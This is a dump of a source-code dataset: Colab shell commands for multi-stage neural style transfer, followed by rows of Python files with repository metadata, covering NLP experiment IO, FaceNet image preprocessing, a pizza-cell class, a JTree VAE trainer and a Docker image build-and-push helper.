!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_6.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-6.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 7 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/7A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/7A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style7' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input7.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_7.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-7.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 8 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/8A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/8A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style8' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input8.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_8.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-8.png' -tv_weight 0 -original_colors 0 -backend cudnn | 0 | 0 | 0 |
4638f5ba6e3f686cec58d6f8ca423b3545ee3d5f | 3,856 | py | Python | io_utils.py | nicolay-r/attitude-extraction-with-attention-and-ds | fb8e9d0d9488363738a88c4c447c7a8cb3e2ec1d | [
"MIT"
] | null | null | null | io_utils.py | nicolay-r/attitude-extraction-with-attention-and-ds | fb8e9d0d9488363738a88c4c447c7a8cb3e2ec1d | [
"MIT"
] | 1 | 2020-12-16T18:21:11.000Z | 2020-12-30T10:08:27.000Z | io_utils.py | nicolay-r/attitude-extraction-with-attention-and-ds | fb8e9d0d9488363738a88c4c447c7a8cb3e2ec1d | [
"MIT"
] | 1 | 2021-03-29T20:58:26.000Z | 2021-03-29T20:58:26.000Z | import logging
from os import path
from os.path import dirname, join
from arekit.common.utils import create_dir_if_not_exists
from arekit.contrib.experiments.cv.default import SimpleCVFolding
from arekit.contrib.experiments.cv.doc_stat.rusentrel import RuSentRelDocStatGenerator
from arekit.contrib.experiments.cv.sentence_based import SentenceBasedCVFolding
from arekit.contrib.experiments.data_io import DataIO
from arekit.contrib.experiments.neutral.annot.rusentrel_three_scale import RuSentRelThreeScaleNeutralAnnotator
from arekit.contrib.experiments.neutral.annot.rusentrel_two_scale import RuSentRelTwoScaleNeutralAnnotator
from arekit.processing.lemmatization.mystem import MystemWrapper
from arekit.source.embeddings.rusvectores import RusvectoresEmbedding
from arekit.source.rusentrel.opinions.formatter import RuSentRelOpinionCollectionFormatter
from arekit.source.rusentrel.synonyms import RuSentRelSynonymsCollection
logger = logging.getLogger(__name__)
| 37.436893 | 110 | 0.747666 | import logging
from os import path
from os.path import dirname, join
from arekit.common.utils import create_dir_if_not_exists
from arekit.contrib.experiments.cv.default import SimpleCVFolding
from arekit.contrib.experiments.cv.doc_stat.rusentrel import RuSentRelDocStatGenerator
from arekit.contrib.experiments.cv.sentence_based import SentenceBasedCVFolding
from arekit.contrib.experiments.data_io import DataIO
from arekit.contrib.experiments.neutral.annot.rusentrel_three_scale import RuSentRelThreeScaleNeutralAnnotator
from arekit.contrib.experiments.neutral.annot.rusentrel_two_scale import RuSentRelTwoScaleNeutralAnnotator
from arekit.processing.lemmatization.mystem import MystemWrapper
from arekit.source.embeddings.rusvectores import RusvectoresEmbedding
from arekit.source.rusentrel.opinions.formatter import RuSentRelOpinionCollectionFormatter
from arekit.source.rusentrel.synonyms import RuSentRelSynonymsCollection
logger = logging.getLogger(__name__)
class RuSentRelBasedExperimentsIOUtils(DataIO):
def __init__(self, init_word_embedding=True):
self.__stemmer = MystemWrapper()
self.__synonym_collection = RuSentRelSynonymsCollection.load_collection(
stemmer=self.__stemmer,
is_read_only=True)
self.__opinion_formatter = RuSentRelOpinionCollectionFormatter
# You may manually select three-scale mode by commenting one of these two lines below.
self.__neutral_annotator = self.__init_two_scale_neutral_annotator()
# self.__neutral_annotator = self.__init_three_scale_neutral_annotator()
self.__word_embedding = self.__create_word_embedding() if init_word_embedding else None
self.__cv_folding_algorithm = self.__init_sentence_based_cv_folding_algorithm()
# region public properties
@property
def Stemmer(self):
return self.__stemmer
@property
def SynonymsCollection(self):
return self.__synonym_collection
@property
def NeutralAnnontator(self):
return self.__neutral_annotator
@property
def WordEmbedding(self):
return self.__word_embedding
@property
def OpinionFormatter(self):
return self.__opinion_formatter
@property
def CVFoldingAlgorithm(self):
return self.__cv_folding_algorithm
# endregion
# region private methods
def __create_word_embedding(self):
we_filepath = path.join(self.get_data_root(), u"w2v/news_rusvectores2.bin.gz")
logger.info("Loading word embedding: {}".format(we_filepath))
return RusvectoresEmbedding.from_word2vec_format(filepath=we_filepath,
binary=True)
def __init_sentence_based_cv_folding_algorithm(self):
return SentenceBasedCVFolding(
docs_stat=RuSentRelDocStatGenerator(synonyms=self.__synonym_collection),
docs_stat_filepath=path.join(self.get_data_root(), u"docs_stat.txt"))
def __init_simple_cv_folding_algoritm(self):
return SimpleCVFolding()
def __init_two_scale_neutral_annotator(self):
return RuSentRelTwoScaleNeutralAnnotator(data_io=self)
def __init_three_scale_neutral_annotator(self):
return RuSentRelThreeScaleNeutralAnnotator(data_io=self,
stemmer=self.__stemmer)
# endregion
# region public methods
def get_data_root(self):
return path.join(dirname(__file__), u"data/")
def get_experiments_dir(self):
experiments_name = u'rusentrel'
target_dir = join(self.get_data_root(), u"./{}/".format(experiments_name))
create_dir_if_not_exists(target_dir)
return target_dir
def get_word_embedding_filepath(self):
return path.join(self.get_data_root(), u"w2v/news_rusvectores2.bin.gz")
# endregion
| 2,207 | 657 | 23 |
75cfe90c3d565a83d48164ad50bd25b3298e863e | 1,038 | py | Python | image_utils.py | Raiszo/facenet-testing | 563ff85a2aec50f86a49e1b1054651584872cb02 | [
"MIT"
] | null | null | null | image_utils.py | Raiszo/facenet-testing | 563ff85a2aec50f86a49e1b1054651584872cb02 | [
"MIT"
] | null | null | null | image_utils.py | Raiszo/facenet-testing | 563ff85a2aec50f86a49e1b1054651584872cb02 | [
"MIT"
] | null | null | null | import numpy as np
from scipy.misc import imread, imresize
FACENET_MEAN = np.array([ 0.52591038, 0.40204082, 0.34178183], dtype=np.float32)
FACENET_STD = np.sqrt(np.array([3941.30175781, 2856.94287109, 2519.35791016], dtype=np.float32) / 255.**2)
def preprocess_image(img):
"""Preprocess an image for squeezenet.
Subtracts the pixel mean and divides by the standard deviation.
"""
return (img.astype(np.float32)/255.0 - FACENET_MEAN) / FACENET_STD
| 34.6 | 106 | 0.685934 | import numpy as np
from scipy.misc import imread, imresize
def load_image(filename, size=None):
img = imread(filename)
if size is not None:
orig_shape = np.array(img.shape[:2])
min_idx = np.argmin(orig_shape)
scale_factor = float(size) / orig_shape[min_idx]
new_shape = (orig_shape * scale_factor).astype(int)
img = imresize(img, scale_factor)
return img
FACENET_MEAN = np.array([ 0.52591038, 0.40204082, 0.34178183], dtype=np.float32)
FACENET_STD = np.sqrt(np.array([3941.30175781, 2856.94287109, 2519.35791016], dtype=np.float32) / 255.**2)
def preprocess_image(img):
"""Preprocess an image for squeezenet.
Subtracts the pixel mean and divides by the standard deviation.
"""
return (img.astype(np.float32)/255.0 - FACENET_MEAN) / FACENET_STD
def load_image_batch(filenames, size=160):
out = np.zeros((len(filenames),size,size,3))
for i,name in enumerate(filenames):
out[i,:,:] = preprocess_image(load_image(name, size=size))
return out
| 519 | 0 | 46 |
ab65c055bcd0082903a22b251f7cfa1e0ddbad07 | 3,466 | py | Python | pizza_cell.py | hex7c0/google-hashcode | a0aecc6a08fe3ffcdd362c2c4abccd58d9b73937 | [
"MIT"
] | null | null | null | pizza_cell.py | hex7c0/google-hashcode | a0aecc6a08fe3ffcdd362c2c4abccd58d9b73937 | [
"MIT"
] | null | null | null | pizza_cell.py | hex7c0/google-hashcode | a0aecc6a08fe3ffcdd362c2c4abccd58d9b73937 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""PizzaCell class."""
from enum import Enum, unique
from cell import Cell
from slice import Slice
@unique
class Ingredient(Enum):
"""Ingredient enum."""
MUSHROOM = 'M'
TOMATO = 'T'
class PizzaCell(object):
"""Cell of Pizza.
:type ingredient: Ingredient or None
:type top: PizzaCell or None
:type bottom: PizzaCell or None
:type right: PizzaCell or None
:type left: PizzaCell or None
:type _cell: Cell or None
:type _slice: Slice or None
:type _has_mushroom: bool
"""
ingredient = None
top = None
bottom = None
right = None
left = None
_slice = None
_cell = None
_has_mushroom = False
def __init__(self, ingredient: str):
"""PizzaCell constructor.
:param ingredient: ingredient in the cell
:type ingredient: str
"""
try:
ingredient = ingredient.upper()
except AttributeError:
raise ValueError
if ingredient == Ingredient.MUSHROOM.value:
self.ingredient = Ingredient.MUSHROOM
self._has_mushroom = True
elif ingredient == Ingredient.TOMATO.value:
self.ingredient = Ingredient.TOMATO
else:
raise ValueError
@property
def cell(self) -> Cell:
"""Cell getter.
:return: cell
:rtype: Cell
"""
return self._cell
@cell.setter
def cell(self, cell: Cell) -> None:
"""Cell setter.
:param cell: cell
:type cell: Cell
:return:
:rtype: None
"""
self._cell = cell
@property
def slice(self) -> Slice:
"""Slice getter.
:return: slice
:rtype: Slice
"""
return self._slice
@slice.setter
def slice(self, slice: Slice) -> None:
"""Slice setter.
:param slice: slice
:type slice: Slice
:return:
:rtype: None
"""
self._slice = slice
@property
def mushroom(self) -> bool:
"""This cell has mushroom.
:return: if mushroom
:rtype: bool
"""
return self._has_mushroom
@property
def tomato(self) -> bool:
"""This cell has tomato.
:return: if mushroom
:rtype: bool
"""
return not self._has_mushroom
@property
def x(self) -> int:
"""Return X of this cell.
:return: x
:rtype: int
"""
return self._cell.x
@property
def y(self) -> int:
"""Return Y of this cell.
:return: y
:rtype: int
"""
return self._cell.y
@property
def id(self) -> int:
"""Return id of this cell.
:return: id
:rtype: int
"""
return self._cell.id
def set_neighbour(self, direction: str, next_pizza_cell) -> None:
"""Look at next cell.
:param direction: direction of the next cell
:param next_pizza_cell: next PizzaCell
:param direction: str
:type next_pizza_cell: PizzaCell
:return:
:rtype: None
"""
setattr(self, direction, next_pizza_cell)
def is_equal(self, cell) -> bool:
"""Check if cell is equal.
:param cell: different PizzaCell
:type cell: PizzaCell
:return:
:rtype: bool
"""
return self.ingredient == cell.ingredient
| 19.255556 | 69 | 0.540681 | # -*- coding: utf-8 -*-
"""PizzaCell class."""
from enum import Enum, unique
from cell import Cell
from slice import Slice
@unique
class Ingredient(Enum):
"""Ingredient enum."""
MUSHROOM = 'M'
TOMATO = 'T'
class PizzaCell(object):
"""Cell of Pizza.
:type ingredient: Ingredient or None
:type top: PizzaCell or None
:type bottom: PizzaCell or None
:type right: PizzaCell or None
:type left: PizzaCell or None
:type _cell: Cell or None
:type _slice: Slice or None
:type _has_mushroom: bool
"""
ingredient = None
top = None
bottom = None
right = None
left = None
_slice = None
_cell = None
_has_mushroom = False
def __init__(self, ingredient: str):
"""PizzaCell constructor.
:param ingredient: ingredient in the cell
:type ingredient: str
"""
try:
ingredient = ingredient.upper()
except AttributeError:
raise ValueError
if ingredient == Ingredient.MUSHROOM.value:
self.ingredient = Ingredient.MUSHROOM
self._has_mushroom = True
elif ingredient == Ingredient.TOMATO.value:
self.ingredient = Ingredient.TOMATO
else:
raise ValueError
@property
def cell(self) -> Cell:
"""Cell getter.
:return: cell
:rtype: Cell
"""
return self._cell
@cell.setter
def cell(self, cell: Cell) -> None:
"""Cell setter.
:param cell: cell
:type cell: Cell
:return:
:rtype: None
"""
self._cell = cell
@property
def slice(self) -> Slice:
"""Slice getter.
:return: slice
:rtype: Slice
"""
return self._slice
@slice.setter
def slice(self, slice: Slice) -> None:
"""Slice setter.
:param slice: slice
:type slice: Slice
:return:
:rtype: None
"""
self._slice = slice
@property
def mushroom(self) -> bool:
"""This cell has mushroom.
:return: if mushroom
:rtype: bool
"""
return self._has_mushroom
@property
def tomato(self) -> bool:
"""This cell has tomato.
:return: if mushroom
:rtype: bool
"""
return not self._has_mushroom
@property
def x(self) -> int:
"""Return X of this cell.
:return: x
:rtype: int
"""
return self._cell.x
@property
def y(self) -> int:
"""Return Y of this cell.
:return: y
:rtype: int
"""
return self._cell.y
@property
def id(self) -> int:
"""Return id of this cell.
:return: id
:rtype: int
"""
return self._cell.id
def set_neighbour(self, direction: str, next_pizza_cell) -> None:
"""Look at next cell.
:param direction: direction of the next cell
:param next_pizza_cell: next PizzaCell
:param direction: str
:type next_pizza_cell: PizzaCell
:return:
:rtype: None
"""
setattr(self, direction, next_pizza_cell)
def is_equal(self, cell) -> bool:
"""Check if cell is equal.
:param cell: different PizzaCell
:type cell: PizzaCell
:return:
:rtype: bool
"""
return self.ingredient == cell.ingredient
| 0 | 0 | 0 |
beca77095f01db98212b8a9f91256b225a689bb8 | 1,945 | py | Python | moses/junction_tree/trainer.py | GT4SD/moses | 2fb13dc757f82484beaae19140be335affb60c4b | [
"MIT"
] | null | null | null | moses/junction_tree/trainer.py | GT4SD/moses | 2fb13dc757f82484beaae19140be335affb60c4b | [
"MIT"
] | null | null | null | moses/junction_tree/trainer.py | GT4SD/moses | 2fb13dc757f82484beaae19140be335affb60c4b | [
"MIT"
] | null | null | null | import torch.optim as optim
import tqdm
from moses.utils import Logger
import torch
| 35.363636 | 103 | 0.488432 | import torch.optim as optim
import tqdm
from moses.utils import Logger
import torch
class JTreeTrainer:
def __init__(self, config):
self.config = config
def fit(self, model, data):
def get_params():
return (p for p in model.parameters() if p.requires_grad)
model.train()
log = Logger()
n_epoch = self.config.num_epochs
optimizer = optim.Adam(get_params(), lr=self.config.lr)
for epoch in range(n_epoch):
if epoch < self.config.kl_start:
kl_w = 0
else:
kl_w = self.config.kl_w
word_acc, topo_acc, assm_acc, steo_acc, all_kl = 0, 0, 0, 0, 0
with tqdm.tqdm(data) as train_dataloader:
train_dataloader.set_description('Train (epoch #{})'.format(epoch))
for it, batch in enumerate(train_dataloader):
model.zero_grad()
loss, kl_div, wacc, tacc, sacc, dacc = model(batch, kl_w)
loss.backward()
optimizer.step()
word_acc += wacc
topo_acc += tacc
assm_acc += sacc
steo_acc += dacc
all_kl += kl_div
postfix = {'kl': all_kl / (it + 1),
'word': word_acc / (it + 1) * 100,
'topo': topo_acc / (it + 1) * 100,
'assm': assm_acc / (it + 1) * 100,
'steo': steo_acc / (it + 1) * 100}
train_dataloader.set_postfix(postfix)
log.append(postfix)
log.save(self.config.log_file)
if epoch % self.config.save_frequency == 0:
model.to('cpu')
torch.save(model.state_dict(), self.config.model_save[:-3]+'_{0:03d}.pt'.format(epoch))
model.to(device)
| 1,786 | -2 | 76 |
ef259f88b97a2ce21f13a711e7f4694b88d463ec | 4,136 | py | Python | src/deploy/builder/stacks/stack_processor.py | werelaxe/drapo | 5f78da735819200f0e7efa6a5e6b3b45ba6e0d4b | [
"MIT"
] | null | null | null | src/deploy/builder/stacks/stack_processor.py | werelaxe/drapo | 5f78da735819200f0e7efa6a5e6b3b45ba6e0d4b | [
"MIT"
] | null | null | null | src/deploy/builder/stacks/stack_processor.py | werelaxe/drapo | 5f78da735819200f0e7efa6a5e6b3b45ba6e0d4b | [
"MIT"
] | null | null | null | import requests
from django.core.files import File
from tempfile import mkdtemp
from shutil import copy, rmtree
import os
import yaml
import zipfile
from django.conf import settings
from docker.client import DockerClient
from docker.models.images import ImageCollection
from docker_registry_client import DockerRegistryClient
from .registry_checker import check_registry
from .models import Stack
DOCKER_COMPOSE_FILE_DEFAULT_NAME = settings.DOCKER_COMPOSE_FILE_DEFAULT_NAME
DOCKER_REGISTRY_URL = settings.DOCKER_REGISTRY_URL
CALLBACK_URL = f"http://{settings.DEPLOYER_HOSTPORT}/tasks/update/"
check_registry()
drc = DockerRegistryClient('http://' + settings.DOCKER_REGISTRY_URL)
docker_client = DockerClient()
ic = ImageCollection(docker_client)
| 33.088 | 112 | 0.735493 | import requests
from django.core.files import File
from tempfile import mkdtemp
from shutil import copy, rmtree
import os
import yaml
import zipfile
from django.conf import settings
from docker.client import DockerClient
from docker.models.images import ImageCollection
from docker_registry_client import DockerRegistryClient
from .registry_checker import check_registry
from .models import Stack
DOCKER_COMPOSE_FILE_DEFAULT_NAME = settings.DOCKER_COMPOSE_FILE_DEFAULT_NAME
DOCKER_REGISTRY_URL = settings.DOCKER_REGISTRY_URL
CALLBACK_URL = f"http://{settings.DEPLOYER_HOSTPORT}/tasks/update/"
check_registry()
drc = DockerRegistryClient('http://' + settings.DOCKER_REGISTRY_URL)
docker_client = DockerClient()
ic = ImageCollection(docker_client)
class StackProcessingError(Exception):
pass
class StackPostProcessingError(Exception):
pass
def get_dc_file_path(unpacked_stack_path, docker_compose_file_path):
return os.path.join(unpacked_stack_path, docker_compose_file_path)
def unpack_stack(stack_path):
temp_dir_name = mkdtemp(prefix='build_')
full_name = os.path.join(temp_dir_name, os.path.basename(stack_path))
copy(stack_path, full_name)
zip_ref = zipfile.ZipFile(stack_path, 'r')
zip_ref.extractall(temp_dir_name)
zip_ref.close()
return temp_dir_name
def get_images_for_building(docker_compose_filename):
image_build_paths = {}
with open(docker_compose_filename) as dc_file:
try:
config = yaml.safe_load(dc_file)
services = config['services']
for name, service in services.items():
if 'build' in service:
image_name = service['image']
image_build_paths[image_name] = service['build']
except yaml.YAMLError as e:
raise StackProcessingError(f"Can not parse docker-compose config: '{e}'")
except KeyError as e:
raise StackProcessingError(f"Invalid docker-compose config. Can not find field: '{e}'")
return image_build_paths
def build_images(images_for_building, stack_name):
for image_name, build_path in images_for_building.items():
full_tag = f'{DOCKER_REGISTRY_URL}/{stack_name}_{image_name}:latest'
if not os.path.isdir(build_path):
raise StackProcessingError(f"For image '{image_name}' build path '{build_path}' is not a directory")
ic.build(path=build_path, tag=full_tag, rm=True)
def push_images(images_for_building, stack_name):
for image_name, build_path in images_for_building.items():
full_tag = f'{DOCKER_REGISTRY_URL}/{stack_name}_{image_name}:latest'
ic.push(full_tag)
def clear_images(images_for_building, stack_name):
for image_name, build_path in images_for_building.items():
full_tag = f'{DOCKER_REGISTRY_URL}/{stack_name}_{image_name}:latest'
